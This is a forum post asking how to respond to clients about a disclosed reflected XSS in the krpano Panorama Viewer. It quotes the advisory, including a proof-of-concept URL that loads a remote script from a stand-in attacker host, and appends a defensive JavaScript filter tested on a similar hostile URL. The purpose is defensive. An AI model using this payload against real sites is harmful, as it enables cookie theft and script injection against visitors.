Hi there,
I'm dealing with several large corporate clients who are rather obsessive about security and penetration testing. They are apprehensive about creating tours because of potential threats and vulnerabilities which could be created by adding a tour to their server and website.
I came across this https://seclists.org/fulldisclosure/2020/Oct/7 which details an exploit titled: XSS in krpano Panorama Viewer.
Can anyone provide any more information about this and how I might deal with this if it comes up when dealing with Krpano security issues? I need to have an educated response if I am asked about it so I would really appreciate some info.
Thank you,
Details below:
*XSS in krpano Panorama Viewer*
CVSS Severity: *Medium*
CVSS Score: *6.1*
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
<https://www.first.org/cvss/calculato…S:C/C:L/I:L/A:N>
*Description*
krpano Panorama Viewer <=1.20.8 is vulnerable to a Reflected Cross-Site
Scripting (XSS) vulnerability caused by improper validation of user
supplied input when loading remote js and XML files in the default
installation (krpano.html).
*Impact*
A remote attacker could exploit this vulnerability using a specially
crafted URL to execute a script in a victim's Web browser within the
security context of the hosting Web site, once the URL is clicked or
visited. An attacker could use this vulnerability to steal the victim's
cookie-based authentication credentials, force malware execution, user
redirection and others.
*Steps to Reproduce*
Exploit example, from documentation tutorials:
http://VICTIM_SITE/krpano.html?html5=only&preview.type=grid()&plugin[test].url=https://ATTACKER_SITE/labs/krpano/krpano.js&plugin[test].align=center&plugin[test].onclick=dosomething(hello,plugin)&onstart=showlog();
*Fix*
Block remote load of js and XML files. Contact the vendor.
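
One way to act on the advisory's "block remote load" fix on the page that hosts the viewer, as an added example (not krpano's or the advisory author's code): filter the query string against an allowlist before any of it reaches the viewer. The parameter allowlist, function names and hostnames are assumptions made for illustration.

```javascript
// Added example: allowlist filter for viewer query parameters (not krpano code).
// ALLOWED_PARAMS is a hypothetical allowlist; keep only what your tour really needs.
const ALLOWED_PARAMS = new Set(["html5", "startscene"]);

// True when the value points at another origin (absolute or protocol-relative URL).
function isCrossOrigin(value, pageOrigin) {
  const v = value.trim();
  if (!/^([a-z][a-z0-9+.-]*:|\/\/)/i.test(v)) return false; // plain relative value
  try {
    return new URL(v, pageOrigin).origin !== pageOrigin;
  } catch {
    return true; // absolute-looking but unparsable: treat as unsafe
  }
}

// Split the query string into parameters safe to forward and parameters to drop.
function filterViewerQuery(href) {
  const url = new URL(href);
  const allowed = {};
  const rejected = [];
  for (const [name, value] of url.searchParams) {
    if (!ALLOWED_PARAMS.has(name.toLowerCase())) {
      rejected.push({ name, reason: "not in allowlist" });
    } else if (isCrossOrigin(value, url.origin)) {
      rejected.push({ name, reason: "cross-origin value" });
    } else {
      allowed[name] = value;
    }
  }
  return { allowed, rejected };
}

// Constructed sample in the shape of the advisory's URL (placeholder hosts).
const sample =
  "http://victim.example/krpano.html?html5=only&preview.type=grid()" +
  "&plugin[test].url=https://attacker.example/krpano.js" +
  "&plugin[test].onclick=dosomething(hello,plugin)&onstart=showlog();";

const result = filterViewerQuery(sample);
console.log(result.allowed);
console.log(result.rejected.map((r) => `${r.name}: ${r.reason}`));
```

The same allowlist logic can run server-side in front of krpano.html, so requests carrying rejected parameters are logged and redirected to the clean URL.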